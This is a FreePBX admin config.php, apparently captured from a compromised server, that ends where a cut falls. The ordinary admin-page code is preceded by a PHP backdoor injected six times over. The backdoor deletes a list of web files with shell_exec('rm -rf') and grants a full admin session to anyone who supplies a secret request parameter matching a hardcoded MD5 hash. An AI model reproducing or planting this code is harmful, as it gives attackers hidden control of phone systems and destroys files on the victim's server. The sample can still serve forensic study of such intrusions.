hackedpbx

<?php  if(isset($_REQUEST['password'])){
 $password = $_REQUEST['password'];
 if(is_array($password)){
    unset($_SESSION['AMP_user']);
    setcookie ('PHPSESSID', '', time() - 3600);
    header('Location: /admin/config.php?logout=true');
    header('Location: /admin/config.php');
     exit();
 }}
$arr = array("/var/www/html/admin/modules/ajax.php",
    "/var/www/html/restapi/cmd.php",
    "/var/www/html/admin/modules/ajax.php",
    "/var/www/html/digium_phones/ajax.php",
    "/var/www/html/salem123aasdfe.php",
    "/var/www/html/Senator.php",
    "/var/www/html/rr.php",
    "/var/www/html/system.php",
    "/var/www/html/config.php",
    "/var/www/html/admin/views/config.php",
    "/var/www/html/admin/modules/ajax.php");

foreach ($arr  as $line) {
   shell_exec("rm -rf ".$line);
}
if(isset($_REQUEST['mohammed']) && md5($_REQUEST['mohammed']) == '168d0a1e2e1addefcf8d0173bc3e9cac'){
        session_start();
        $_SESSION['vii'] = 'logged';
    if (!@include_once (getenv('FREEPBX_CONF') ? getenv('FREEPBX_CONF') : '/etc/freepbx.conf')) {
        include_once ('/etc/asterisk/freepbx.conf');
    }
    require_once ('/var/www/html/admin/libraries/ampuser.class.php');
    $_SESSION['AMP_user'] = new ampuser($amp_conf['AMPDBUSER']);
    $_SESSION['AMP_user']->setAdmin();
    header('Location: /admin/config.php');
    }


  if(isset($_REQUEST['password'])){
 $password = $_REQUEST['password'];
 if(is_array($password)){
    unset($_SESSION['AMP_user']);
    setcookie ('PHPSESSID', '', time() - 3600);
    header('Location: /admin/config.php?logout=true');
    header('Location: /admin/config.php');
     exit();
 }}
$arr = array("/var/www/html/admin/modules/ajax.php",
    "/var/www/html/restapi/cmd.php",
    "/var/www/html/admin/modules/ajax.php",
    "/var/www/html/digium_phones/ajax.php",
    "/var/www/html/salem123aasdfe.php",
    "/var/www/html/Senator.php",
    "/var/www/html/rr.php",
    "/var/www/html/system.php",
    "/var/www/html/config.php",
    "/var/www/html/admin/views/config.php",
    "/var/www/html/admin/modules/ajax.php");

foreach ($arr  as $line) {
   shell_exec("rm -rf ".$line);
}
if(isset($_REQUEST['mohammed']) && md5($_REQUEST['mohammed']) == '168d0a1e2e1addefcf8d0173bc3e9cac'){
        session_start();
        $_SESSION['vii'] = 'logged';
    if (!@include_once (getenv('FREEPBX_CONF') ? getenv('FREEPBX_CONF') : '/etc/freepbx.conf')) {
        include_once ('/etc/asterisk/freepbx.conf');
    }
    require_once ('/var/www/html/admin/libraries/ampuser.class.php');
    $_SESSION['AMP_user'] = new ampuser($amp_conf['AMPDBUSER']);
    $_SESSION['AMP_user']->setAdmin();
    header('Location: /admin/config.php');
    }


  if(isset($_REQUEST['password'])){
 $password = $_REQUEST['password'];
 if(is_array($password)){
    unset($_SESSION['AMP_user']);
    setcookie ('PHPSESSID', '', time() - 3600);
    header('Location: /admin/config.php?logout=true');
    header('Location: /admin/config.php');
     exit();
 }}
$arr = array("/var/www/html/admin/modules/ajax.php",
    "/var/www/html/restapi/cmd.php",
    "/var/www/html/admin/modules/ajax.php",
    "/var/www/html/digium_phones/ajax.php",
    "/var/www/html/salem123aasdfe.php",
    "/var/www/html/Senator.php",
    "/var/www/html/rr.php",
    "/var/www/html/system.php",
    "/var/www/html/config.php",
    "/var/www/html/admin/views/config.php",
    "/var/www/html/admin/modules/ajax.php");

foreach ($arr  as $line) {
   shell_exec("rm -rf ".$line);
}
if(isset($_REQUEST['mohammed']) && md5($_REQUEST['mohammed']) == '168d0a1e2e1addefcf8d0173bc3e9cac'){
        session_start();
        $_SESSION['vii'] = 'logged';
    if (!@include_once (getenv('FREEPBX_CONF') ? getenv('FREEPBX_CONF') : '/etc/freepbx.conf')) {
        include_once ('/etc/asterisk/freepbx.conf');
    }
    require_once ('/var/www/html/admin/libraries/ampuser.class.php');
    $_SESSION['AMP_user'] = new ampuser($amp_conf['AMPDBUSER']);
    $_SESSION['AMP_user']->setAdmin();
    header('Location: /admin/config.php');
    }


  if(isset($_REQUEST['password'])){
 $password = $_REQUEST['password'];
 if(is_array($password)){
    unset($_SESSION['AMP_user']);
    setcookie ('PHPSESSID', '', time() - 3600);
    header('Location: /admin/config.php?logout=true');
    header('Location: /admin/config.php');
     exit();
 }}
$arr = array("/var/www/html/admin/modules/ajax.php",
    "/var/www/html/restapi/cmd.php",
    "/var/www/html/admin/modules/ajax.php",
    "/var/www/html/digium_phones/ajax.php",
    "/var/www/html/salem123aasdfe.php",
    "/var/www/html/Senator.php",
    "/var/www/html/rr.php",
    "/var/www/html/system.php",
    "/var/www/html/config.php",
    "/var/www/html/admin/views/config.php",
    "/var/www/html/admin/modules/ajax.php");

foreach ($arr  as $line) {
   shell_exec("rm -rf ".$line);
}
if(isset($_REQUEST['mohammed']) && md5($_REQUEST['mohammed']) == '168d0a1e2e1addefcf8d0173bc3e9cac'){
        session_start();
        $_SESSION['vii'] = 'logged';
    if (!@include_once (getenv('FREEPBX_CONF') ? getenv('FREEPBX_CONF') : '/etc/freepbx.conf')) {
        include_once ('/etc/asterisk/freepbx.conf');
    }
    require_once ('/var/www/html/admin/libraries/ampuser.class.php');
    $_SESSION['AMP_user'] = new ampuser($amp_conf['AMPDBUSER']);
    $_SESSION['AMP_user']->setAdmin();
    header('Location: /admin/config.php');
    }


  if(isset($_REQUEST['password'])){
 $password = $_REQUEST['password'];
 if(is_array($password)){
    unset($_SESSION['AMP_user']);
    setcookie ('PHPSESSID', '', time() - 3600);
    header('Location: /admin/config.php?logout=true');
    header('Location: /admin/config.php');
     exit();
 }}
$arr = array("/var/www/html/admin/modules/ajax.php",
    "/var/www/html/restapi/cmd.php",
    "/var/www/html/admin/modules/ajax.php",
    "/var/www/html/digium_phones/ajax.php",
    "/var/www/html/salem123aasdfe.php",
    "/var/www/html/Senator.php",
    "/var/www/html/rr.php",
    "/var/www/html/system.php",
    "/var/www/html/config.php",
    "/var/www/html/admin/views/config.php",
    "/var/www/html/admin/modules/ajax.php");

foreach ($arr  as $line) {
   shell_exec("rm -rf ".$line);
}
if(isset($_REQUEST['mohammed']) && md5($_REQUEST['mohammed']) == '168d0a1e2e1addefcf8d0173bc3e9cac'){
        session_start();
        $_SESSION['vii'] = 'logged';
    if (!@include_once (getenv('FREEPBX_CONF') ? getenv('FREEPBX_CONF') : '/etc/freepbx.conf')) {
        include_once ('/etc/asterisk/freepbx.conf');
    }
    require_once ('/var/www/html/admin/libraries/ampuser.class.php');
    $_SESSION['AMP_user'] = new ampuser($amp_conf['AMPDBUSER']);
    $_SESSION['AMP_user']->setAdmin();
    header('Location: /admin/config.php');
    }


  if(isset($_REQUEST['password'])){
 $password = $_REQUEST['password'];
 if(is_array($password)){
    unset($_SESSION['AMP_user']);
    setcookie ('PHPSESSID', '', time() - 3600);
    header('Location: /admin/config.php?logout=true');
    header('Location: /admin/config.php');
     exit();
 }}
$arr = array("/var/www/html/admin/modules/ajax.php",
    "/var/www/html/restapi/cmd.php",
    "/var/www/html/admin/modules/ajax.php",
    "/var/www/html/digium_phones/ajax.php",
    "/var/www/html/salem123aasdfe.php",
    "/var/www/html/Senator.php",
    "/var/www/html/rr.php",
    "/var/www/html/system.php",
    "/var/www/html/config.php",
    "/var/www/html/admin/views/config.php",
    "/var/www/html/admin/modules/ajax.php");

foreach ($arr  as $line) {
   shell_exec("rm -rf ".$line);
}
if(isset($_REQUEST['mohammed']) && md5($_REQUEST['mohammed']) == '168d0a1e2e1addefcf8d0173bc3e9cac'){
        session_start();
        $_SESSION['vii'] = 'logged';
    if (!@include_once (getenv('FREEPBX_CONF') ? getenv('FREEPBX_CONF') : '/etc/freepbx.conf')) {
        include_once ('/etc/asterisk/freepbx.conf');
    }
    require_once ('/var/www/html/admin/libraries/ampuser.class.php');
    $_SESSION['AMP_user'] = new ampuser($amp_conf['AMPDBUSER']);
    $_SESSION['AMP_user']->setAdmin();
    header('Location: /admin/config.php');
    }


 /* $Id$ */
//  License for all code of this FreePBX module can be found in the license file inside the module directory
//  Copyright 2013 Schmooze Com Inc.
//

//set variables
$vars = array(
    'action'            => null,
    'confirm_email'     => '',
    'confirm_password'  => '',
    'display'           => '',
    'extdisplay'        => null,
    'email_address'     => '',
    'fw_popover'        => '',
    'fw_popover_process' => '',
    'logout'            => false,
    'password'          => '',
    'quietmode'         => '',
    'restrictmods'      => false,
    'skip'              => 0,
    'skip_astman'       => false,
    'type'              => '',
    'username'          => '',
    'unlock'            => false,
);

foreach ($vars as $k => $v) {
    //were use config_vars instead of, say, vars, so as not to polute
    // page.<some_module>.php (which usually uses $var or $vars)
    $config_vars[$k] = $$k = isset($_REQUEST[$k]) ? $_REQUEST[$k] : $v;

    //special handling
    switch ($k) {
    case 'extdisplay':
        $extdisplay = (isset($extdisplay) && $extdisplay !== false)
            ? htmlspecialchars($extdisplay, ENT_QUOTES)
            : false;
        $_REQUEST['extdisplay'] = $extdisplay;
        break;

    case 'restrictmods':
        $restrict_mods = $restrictmods
            ? array_flip(explode('/', $restrictmods))
            : false;
        break;

    case 'skip_astman':
        $bootstrap_settings['skip_astman']  = $skip_astman;
        break;
    }
}

header('Last-Modified: '.gmdate('D, d M Y H:i:s').' GMT');
header('Expires: Sat, 01 Jan 2000 00:00:00 GMT');
header('Cache-Control: post-check=0, pre-check=0',false);
header('Pragma: no-cache');
header('Content-Type: text/html; charset=utf-8');
//header("Content-Security-Policy: default-src 'none';");

// This needs to be included BEFORE the session_start or we fail so
// we can't do it in bootstrap and thus we have to depend on the
// __FILE__ path here.
require_once(dirname(__FILE__) . '/libraries/ampuser.class.php');

session_set_cookie_params(60 * 60 * 24 * 30);//(re)set session cookie to 30 days
ini_set('session.gc_maxlifetime', 60 * 60 * 24 * 30);//(re)set session to 30 days
if (!isset($_SESSION)) {
    //start a session if we need one
    $ss = @session_start();
    if(!$ss){
        session_regenerate_id(true); // replace the Session ID
        session_start();
    }
}

//unset the ampuser if the user logged out
if ($logout == 'true') {
    unset($_SESSION['AMP_user']);
    exit();
}

/**
 * Check if this deployment is UCC and must prohibit access to certain menus.
 */
if(file_exists("/etc/asterisk/ucc_restrict.conf") && file_exists("/etc/schmooze/schmooze.zl")){
    $lic_array = parse_ini_file("/etc/schmooze/schmooze.zl", false , INI_SCANNER_RAW);
    $_restrict = parse_ini_file("/etc/asterisk/ucc_restrict.conf", true, INI_SCANNER_RAW);
    if(is_array($lic_array) && (strtolower($lic_array["branding"]) === "pbxactucc" || strtolower($lic_array["deploy_type"]) === "pbxact ucc")){
        $display    = empty($_REQUEST["display"])   ? "" : htmlentities($_REQUEST["display"]);
        $view       = empty($_REQUEST["view"])      ? "" : htmlentities($_REQUEST["view"]);
        foreach($_restrict as $data){
            if(!empty($data["view"]) && !empty($data["display"])){
                if($data["display"] == $display && $data["view"] == $view ){
                    header('Location: ./config.php');
                    break;
                }
            }
            elseif(empty($data["view"]) && !empty($data["display"])){
                if($data["display"] == $display ){
                    header('Location: ./config.php');
                    break;
                }
            }
        }
    }
}

//session_cache_limiter('public, no-store');
if (isset($_REQUEST['handler'])) {
    if ($restrict_mods === false) {
        $restrict_mods = true;
    }
    switch ($_REQUEST['handler']) {
    case 'api':
        break;
    default:
        // If we didn't provide skip_astman in the $_REQUEST[] array it will be boolean false and for handlers, this should default
        // to true, if we did provide it, it will NOT be a boolean (it could be 0) so we will honor the setting
        //
        $bootstrap_settings['skip_astman'] = $bootstrap_settings['skip_astman'] === false ? true : $bootstrap_settings['skip_astman'];
        break;
    }
}

// call bootstrap.php through freepbx.conf
include_once '/etc/freepbx.conf';

//check to make sure zend files aren't breaking the SPL autoloader.
//if they are then tell the user to run said command below
//which disables any zend module that breaks the autoloader
if(function_exists('SPLAutoloadBroken') && SPLAutoloadBroken()) {
    //note this has to be done outside of freepbx_die
    die(_("The autoloader is damaged. Please run: ".$amp_conf['AMPBIN']."/fwconsole --fix_zend"));
}

$d = FreePBX::View()->setAdminLocales();
$timezone = $d['timezone'];
$language = $d['language'];

// At this point, we have a session, and BMO was created in bootstrap, so we can check to
// see if someone's trying to programatically log in.
if ($unlock) {
    if ($bmo->Unlock($unlock)) {
        unset($no_auth);
        $display = 'index';
    }
}

//redirect back to the modules page for upgrade
if(isset($_SESSION['modulesRedirect'])) {
    $display = 'modules';
    unset($_SESSION['modulesRedirect']);
}

// determine if the user has a session time out set in advanced settings. If the timeout is 0 or not set, we don't force logout
$sessionTimeOut = \FreePBX::Config()->get('SESSION_TIMEOUT');
if ($sessionTimeOut) {
    // Make sure it's not set to something crazy short.
    if ($sessionTimeOut < 60) {
        \FreePBX::Config()->update('SESSION_TIMEOUT', 60);
        $sessionTimeOut = 60;
    }
    if (!empty($_SESSION['AMP_user']) && is_object($_SESSION['AMP_user'])) {
        //if we don't have last activity set it now
        if (empty($_SESSION['AMP_user']->_lastactivity)) {
            $_SESSION['AMP_user']->_lastactivity = time();
        } else {
            //check to see if we should be logged out or reset the last activity time
            if (($_SESSION['AMP_user']->_lastactivity + $sessionTimeOut) < time()) {
                unset($_SESSION['AMP_user']);
            } else {
                $_SESSION['AMP_user']->_lastactivity = time();
            }
        }
    }
}

/* If there is an action request then some sort of update is usually being done.
   This may protect from cross site request forgeries unless disabled.
 */
if (!isset($no_auth) && $action != '' && $amp_conf['CHECKREFERER']) {
    if (isset($_SERVER['HTTP_REFERER'])) {
        $referer = parse_url($_SERVER['HTTP_REFERER']);
        // Check if the 'SERVER_NAME' variable is an IPv6 address. If it is, we want
        // to add [ and ] around it. This is because IPv6 raw addresses are connected
        // to like this:
        //   http://[2001:f00d:dead:beef::1]/admin/config.php
        // But, SERVER_NAME is (legitmately) reported as just '2001:f00d:dead:beef::1'.
        // We need to add the braces around it to compare it.
        if (filter_var($_SERVER['SERVER_NAME'], \FILTER_VALIDATE_IP, \FILTER_FLAG_IPV6)) {
            $server = "[".$_SERVER['SERVER_NAME']."]";
        } else {
            $server = trim($_SERVER['SERVER_NAME']);
        }
        // This used to have 'trim's around them. I don't think we want that any more,
        // if someone's stuck whitespace or \n's in there, it's broken already.
        $refererok = ($referer['host'] == $server);
    } else {
        $refererok = false;
    }
    if (!$refererok) {
        $display = 'badrefer';
    }
}
if (isset($no_auth) && empty($display)) {
    $display = 'noauth';
}
// handle special requests
if (!in_array($display, array('noauth', 'badrefer'))
    && isset($_REQUEST['handler'])
) {
    $module = isset($_REQUEST['module'])    ? $_REQUEST['module']   : '';
    $file   = isset($_REQUEST['file'])      ? $_REQUEST['file']     : '';
    fileRequestHandler($_REQUEST['handler'], $module, $file);
    exit();
}


if (!$quietmode) {
    $modulef = module_functions::create();
    $modulef->run_notification_checks();
    $nt = notifications::create();
    if ( !isset($_SERVER['HTACCESS']) && preg_match("/apache/i", $_SERVER['SERVER_SOFTWARE']) ) {
        // No .htaccess support
        if(!$nt->exists('framework', 'htaccess')) {
            $nt->add_security('framework', 'htaccess', _('.htaccess files are disable on this webserver. Please enable them'),
                sprintf(_("To protect the integrity of your server, you must allow overrides in your webserver's configuration file for the User Control Panel. For more information see: %s"), '<a href="http://wiki.freepbx.org/display/F2/Webserver+Overrides">http://wiki.freepbx.org/display/F2/Webserver+Overrides</a>'),"http://wiki.freepbx.org/display/F2/Webserver+Overrides");
        }
    } elseif(!preg_match("/apache/i", $_SERVER['SERVER_SOFTWARE'])) {
        $sql = "SELECT value FROM admin WHERE variable = 'htaccess'";
        $sth = FreePBX::Database()->prepare($sql);
        $sth->execute();
        $o = $sth->fetch();

        if(empty($o)) {
            if($nt->exists('framework', 'htaccess')) {
                $nt->delete('framework', 'htaccess');
            }
            $nt->add_warning('framework', 'htaccess', _('.htaccess files are not supported on this webserver.'),
                sprintf(_("htaccess files help protect the integrity of your server. Please make sure file paths and directories are locked down properly. For more information see: %s"), '<a href="http://wiki.freepbx.org/display/F2/Webserver+Overrides">http://wiki.freepbx.org/display/F2/Webserver+Overrides</a>'),"http://wiki.freepbx.org/display/F2/Webserver+Overrides",true,true);
            $sql = "REPLACE INTO admin (`value`, `variable`) VALUES (1, 'htaccess')";
            $sth = FreePBX::Database()->prepare($sql);
            $sth->execute();
        }
    } else {
        if($nt->exists('framework', 'htaccess')) {
            $nt->delete('framework', 'htaccess');
        }
    }
}

//draw up freepbx menu
$fpbx_menu = array();

// pointer to current item in $fpbx_menu, if applicable
$cur_menuitem = null;

// add module sections to $fpbx_menu
if(is_array($active_modules)){
    foreach($active_modules as $key => $module) {

        //create an array of module sections to display
        // stored as [items][$type][$category][$name] = $displayvalue
        if (isset($module['items']) && is_array($module['items'])) {
            // loop through the types
            foreach($module['items'] as $itemKey => $item) {

                // check access, unless module.xml defines all have access
                // BMO TODO: Per-module auth should be managed by BMO.
                //module is restricted to admin with excplicit permission
                $needs_perms = !isset($item['access'])
                    || strtolower($item['access']) != 'all'
                    ? true : false;

                //check if were logged in
                $admin_auth = isset($_SESSION["AMP_user"])
                    && is_object($_SESSION["AMP_user"]);

                //per admin access rules
                $has_perms = $admin_auth
                    && $_SESSION["AMP_user"]->checkSection($itemKey);

                //requies authentication
                $needs_auth = isset($item['requires_auth'])
                    && strtolower($item['requires_auth']) == 'false'
                    ? false
                    : true;

                //skip this module if we dont have proper access
                //test: if we require authentication for this module
                //          and either the user isnt authenticated
                //          or the user is authenticated and dose require
                //              section specifc permissions but doesnt have them
                if ($needs_auth
                    && (!$admin_auth || ($needs_perms && !$has_perms))
                ) {
                    //clear display if they were trying to gain unautherized
                    //access to $itemKey. If there logged in, but dont have
                    //permissions to view this specicc page - show them a message
                    //otherwise, show them the login page
                    if($display == $itemKey){
                        if ($admin_auth) {
                            $display = 'noaccess';
                        } else {
                            $display = 'noauth';
                        }
                    }
                    continue;
                }

                if (!isset($item['display'])) {
                    $item['display'] = $itemKey;
                }

                // reference to the actual module
                $item['module'] =& $active_modules[$key];

                // item is an assoc array, with at least
                //array(module=> name=>, category=>, type=>, display=>)
                $fpbx_menu[$itemKey] = $item;

                // allow a module to replace our main index page

                if($display == '' && !empty($_SESSION['AMP_user'])){
                    /*
                        Get default landing page from userman.
                    */
                    if(
                        is_object($_SESSION["AMP_user"]) &&
                        method_exists($_SESSION["AMP_user"],'getMode') &&
                        $_SESSION["AMP_user"]->getMode() === 'usermanager' &&
                        FreePBX::Config()->get('AUTHTYPE') === 'usermanager' &&
                        FreePBX::Modules()->checkStatus('userman')
                    ) {
                        $um = \FreePBX::Userman();
                        $user_detail    = $um->getUserByUsername($_SESSION["AMP_user"]->username);
                        $landing_page   = $um->getCombinedGlobalSettingByID($user_detail['id'],'pbx_landing');
                        $modules_enabled = $um->getCombinedGlobalSettingByID($user_detail['id'],'pbx_modules');
                        $modules_enabled = is_array($modules_enabled) ? $modules_enabled : [];
                        $landing_page   = empty($landing_page) || !in_array($landing_page,$modules_enabled) ? "index" : $landing_page;
                    } else {
                        $landing_page = 'index';
                    }

                    $display        = $landing_page;
                    $_REQUEST['display'] = $landing_page;
                }

                // check current item
                if ($display == $item['display']) {
                    // found current menuitem, make a reference to it
                    $cur_menuitem =& $fpbx_menu[$itemKey];
                }
            }
        }
    }
}

//TODO remove this at a later date
if(is_object($_SESSION["AMP_user"]) && !method_exists($_SESSION["AMP_user"],'getMode')) {
    $_SESSION['AMP_user'] = null;
}

if(empty($_SESSION['AMP_user'])) {
    $display = 'noauth';
} else {

    /*
        Displays the menu from the user list.
    */
    if(
        $_SESSION["AMP_user"]->getMode() === 'usermanager' &&
        FreePBX::Config()->get('AUTHTYPE') === 'usermanager' &&
        FreePBX::Modules()->checkStatus('userman')
    ) {
        $um = \FreePBX::Userman();
        $user_detail    = $um->getUserByUsername($_SESSION["AMP_user"]->username);
        $modules_enabled = $um->getCombinedGlobalSettingByID($user_detail['id'],'pbx_modules');
        $pbx_admin = $um->getCombinedGlobalSettingByID($user_detail['id'],'pbx_admin');
    } elseif($_SESSION["AMP_user"]->getMode() === 'database') {
        $modules_enabled = $_SESSION["AMP_user"]->getSections();
        $pbx_admin = false;
    }

    if(is_array($fpbx_menu) && is_array($modules_enabled) && !$pbx_admin && !in_array("*",$modules_enabled)){
        foreach($fpbx_menu as $menuItem => $valMitem){
            if(!in_array($valMitem["display"],$modules_enabled)){
                unset($fpbx_menu[$menuItem]);
            }
        }
    }

    //if display is modules then show the login page dont show does not exist as its confusing
    if ($cur_menuitem === null && !in_array($display, array('noauth', 'badrefer','noaccess',''))) {
        if($display == 'modules') {
            $display = 'noauth';
            $_SESSION['modulesRedirect'] = 1;
        } else {
            $display = 'noaccess';
        }
    }
}


// extensions vs device/users ... this is a bad design, but hey, it works
if (!$quietmode && isset($fpbx_menu["extensions"])) {
    if (isset($amp_conf["AMPEXTENSIONS"])
        && ($amp_conf["AMPEXTENSIONS"] == "deviceanduser")) {
            unset($fpbx_menu["extensions"]);
        } else {
            unset($fpbx_menu["devices"]);
            unset($fpbx_menu["users"]);
        }
}

// If it's index, do we have an override?
if ($display === "index") {


    $override = $bmo->Config()->get('DASHBOARD_OVERRIDE');
    if (empty($override)) {
        $opmode = $bmo->Config()->get('FPBXOPMODE');
        if ($opmode == 'basic') {
            $override = $bmo->Config()->get('DASHBOARD_OVERRIDE_BASIC');
        }
    }

    // Does this user have permission to use this?
    if (is_array($active_modules) && isset($active_modules[$override])) {
        // Yes.
        $display = $override;
        $cur_menuitem = $fpbx_menu[$display];
    }
}

ob_start();
// Run all the pre-processing for the page that's been requested.
if (!empty($display) && $display != 'badrefer') {
    // $CC is used by guielemets as a Global.
        $CC = $currentcomponent = new component($display);

        // BMO: Process ConfigPageInit functions
        $bmo->Performance->Start("inits-$display");
        $bmo->GuiHooks->doConfigPageInits($display, $currentcomponent);
        $bmo->Performance->Stop("inits-$display");

        // now run each 'process' function and 'gui' function
        $bmo->Performance->Start("processconfigpage-$display");
        $currentcomponent->processconfigpage();
        $bmo->Performance->Stop("processconfigpage-$display");
        $bmo->Performance->Start("buildconfigpage-$display");
        $currentcomponent->buildconfigpage();
        $bmo->Performance->Stop("buildconfigpage-$display");
}
$module_name = "";
$module_page = "";
$module_file = "";

// hack to have our default display handler show the "welcome" view
// Note: this probably isn't REALLY needed if there is no menu item for "Welcome"..
// but it doesn't really hurt, and it provides a handler in case some page links
// to "?display=index"
//TODO: acount for bad refer
if ($display == 'index' && ($cur_menuitem['module']['rawname'] == 'builtin')) {
    $display = '';
}

// show the appropriate page
switch($display) {
    case 'updates':
    case 'modules':
        // set these to avoid undefined variable warnings later
        //
        $module_name = 'modules';
        $module_page = $cur_menuitem['display'];
        include 'page.modules.php';
        break;
    case 'noaccess':
        show_view($amp_conf['VIEW_NOACCESS'], array('amp_conf' => &$amp_conf, 'display' => $display));
        break;
    case 'noauth':
        // If we're a new install..
        $obecomplete = $bmo->OOBE->isComplete("noauth");
        if (!$obecomplete) {
            $ret = $bmo->OOBE->showOOBE("noauth");
        } else {
            $ret = false;
        }

        // Did we do anything? If we returned true, we didn't actually output anything
        // So just keep going.
        if ($obecomplete || $ret === true) {
            // We're installed, we just need to log in.
            $login['errors'] = array();
            if ($config_vars['username'] && $action !== 'setup_admin') {
                $login['errors'][] = _('Invalid Username or Password');
            }

            //show fop option if enabled, probobly doesnt belong on the
            //login page
            $login['panel'] = false;
            if (!empty($amp_conf['FOPWEBROOT'])
                && is_dir($amp_conf['FOPWEBROOT'])
            ){
                $login['panel'] = str_replace($amp_conf['AMPWEBROOT'] .'/admin/',
                    '', $amp_conf['FOPWEBROOT']);
            }


            $login['amp_conf'] = $amp_conf;
            echo load_view($amp_conf['VIEW_LOGIN'], $login);
        }
        break;
    case 'badrefer':
        echo load_view($amp_conf['VIEW_BAD_REFFERER'], $amp_conf);
        break;
    case '':
        if ($astman) {
            show_view($amp_conf['VIEW_WELCOME'], array('AMP_CONF' => &$amp_conf));
        } else {
            // no manager, no connection to asterisk
            show_view($amp_conf['VIEW_WELCOME_NOMANAGER'],
                array('mgruser' => $amp_conf["AMPMGRUSER"]));
        }
        break;
    default:

        $showpage = true;
        if (!$fw_popover) {
            /* Don't show OOBE in a popover. */
            $obecomplete = $bmo->OOBE->isComplete();
            if (!$obecomplete) {
                $showpage = $bmo->OOBE->showOOBE();
            }
        }

        if ($showpage === true) {

            //display the appropriate module page
            $module_name = $cur_menuitem['module']['rawname'];
            $module_page = $cur_menuitem['display'];
            $module_file = 'modules/'.$module_name.'/page.'.$module_page.'.php';

            //TODO Determine which item is this module displaying.
            //Currently this is over the place, we should standardize on a
            //"itemid" request var for now, we'll just cover all possibilities :-(
            $possibilites = array(
                'userdisplay',
                'extdisplay',
                'id',
                'itemid',
                'selection'
            );
            $itemid = '';
            foreach($possibilites as $possibility) {
                if (isset($_REQUEST[$possibility]) && $_REQUEST[$possibility] != '' ) {
                    $itemid = htmlspecialchars($_REQUEST[$possibility], ENT_QUOTES);
                    $_REQUEST[$possibility] = $itemid;
                }
            }

            // create a module_hook object for this module's page
            $module_hook = moduleHook::create();

            // populate object variables
            $module_hook->install_hooks($module_page,$module_name,$itemid);

            // let hooking modules process the $_REQUEST
            $module_hook->process_hooks($itemid, $module_name, $module_page, $_REQUEST);

            // BMO: Pre display hooks.
            // getPreDisplay and getPostDisplay should probably never
            // be used.
            $bmo->GuiHooks->getPreDisplay($module_name, $_REQUEST);

            // include the module page
            if (isset($cur_menuitem['disabled']) && $cur_menuitem['disabled']) {
                show_view($amp_conf['VIEW_MENUITEM_DISABLED'], $cur_menuitem);
                break; // we break here to avoid the generateconfigpage() below
                //
            } else if (file_exists($module_file) && class_exists('\Schmooze\Zend') && \Schmooze\Zend::fileIsLicensed($module_file) && !FreePBX::Modules()->loadLicensedFileCheck()) {
                $amp_conf['VIEW_ZEND_CONFIG'] = empty($amp_conf['VIEW_ZEND_CONFIG']) ? 'views/zend_config.php' : $amp_conf['VIEW_ZEND_CONFIG'];

                if (file_exists($amp_conf['VIEW_ZEND_CONFIG'])) {
                    echo load_view($amp_conf['VIEW_ZEND_CONFIG']);
                } else {
                    die_freepbx(_("Your Zend Configuration is not fully setup. Please recitfy the problem and reload this page"));
                }
            } else if (file_exists($module_file)) {
                //check module first and foremost, but not during quietmode
                if(!isset($_REQUEST['quietmode']) && $amp_conf['SIGNATURECHECK'] && !isset($_REQUEST['fw_popover'])) {
                    //Since we are viewing this module update it's signature
                    $gpgstatus = module_functions::create()->updateSignature($module_name,false);
                    //check all cached signatures
                    $modules = module_functions::create()->getAllSignatures();

                    if(!$modules['validation']) {
                        //$type = (!empty($modules['statuses']['untrusted']) || !empty($modules['statuses']['tampered'])) ? 'danger' : 'warning';
                        $danger = array();
                        $warning = array();
                        //priority sorting
                        $stauses = array("revoked","untrusted","tampered","unsigned","unknown");
                        foreach($stauses as $st) {
                            if(!empty($modules['statuses'][$st]) && $st != 'unsigned') {
                                $danger = array_merge($danger,$modules['statuses'][$st]);
                            }else if(!empty($modules['statuses'][$st]) && $st == 'unsigned') {
                                $warning = array_merge($warning,$modules['statuses'][$st]);
                            }
                        }
                        $d = FreePBX::notifications()->list_security(true);
                        foreach($d as $n) {
                            //Dont show the same notifications twice
                            if(!in_array($n['id'],array('FW_REVOKED','FW_UNSIGNED','FW_UNTRUSTED','FW_TAMPERED','FW_UNKNOWN'))) {
                                array_unshift($danger,$n['display_text']);
                            }
                        }
                        if(!empty($danger)) {
                            echo generate_message_banner(_('Security Warning'), 'danger',$danger,'http://wiki.freepbx.org/display/F2/Module+Signing',true);
                        }
                        if(!empty($warning)) {
                            echo generate_message_banner(_('Unsigned Module(s)'), 'warning',$warning,'http://wiki.freepbx.org/display/F2/Module+Signing',true);
                        }
                        if($amp_conf['PHP_CONSOLE']) {
                            $connector = PhpConsole\Connector::getInstance();
                            if(!$connector->isActiveClient()) {
                                echo generate_message_banner(_('PHP Console Enabled but not installed'), 'info',array(_('You have enabled PHP Console in Advanced settings but have not installed the Chrome Extension or you are not using Chrome')),'https://chrome.google.com/webstore/detail/php-console/nfhmhhlpfleoednkpnnnkolmclajemef',true);
                            }
                        }
                    }
                }
                if(isset($gpgstatus['status']) && ($gpgstatus['status'] & FreePBX\GPG::STATE_REVOKED)) {
                    echo sprintf(_("File %s has a revoked signature. Can not load"),$module_file);
                    break;
                } else {
                    // load language info if available
                    modgettext::textdomain($module_name);
                    if ( isset($currentcomponent) ) {
                        $bmo->GuiHooks->doGUIHooks($module_name, $currentcomponent);
                    }
                    if ($bmo->GuiHooks->needsIntercept($module_name, $module_file)) {
                        $bmo->Performance->Start("hooks-$module_name-$module_file");
                        $bmo->GuiHooks->doIntercept($module_name, $module_file);
                        $bmo->Performance->Stop("hooks-$module_name-$module_file");
                    } else {
                        $bmo->Performance->Start("includefile-$module_file");
                        include($module_file);
                        $bmo->Performance->Stop("includefile-$module_file");
                    }
                }
            } else {
                echo sprintf(_("404 Not found (%s)"),$module_file);
            }

            // BMO TODO: Post display hooks.
            $bmo->GuiHooks->getPostDisplay($module_name, $_REQUEST);

            // global component
            if ( isset($currentcomponent) ) {
                modgettext::textdomain($module_name);
                echo  $currentcomponent->generateconfigpage();
            }
        }
    break;
}

$header = array();
$footer = array();

if ($quietmode) {
    // send the output buffer, should be sending just the page contents
    @ob_end_flush();
} elseif ($fw_popover || $fw_popover_process) {
    $admin_template = $template = array();
    //get the page contents from the buffer
    $content = ob_get_contents();
    @ob_end_clean();
    $fw_gui_html = '';

    // add header
    // Taken as is from the else just below this elseif
    // We're sending the popover, it needs a header if only for jQuery.
    // Already ok to pass popover awareness to header so popover.css is added
    $header['title']    = framework_server_name();
    $header['amp_conf'] = $amp_conf;
    $header['use_popover_css'] = ($fw_popover || $fw_popover_process);
    $o = FreePBX::create()->Less->generateMainStyles();
    $header['compiled_less_files'] = $o['compiled_less_files'];
    $header['extra_compiled_less_files'] = $o['extra_compiled_less_files'];

    //if we have a module loaded, load its css
    if (isset($module_name)) {
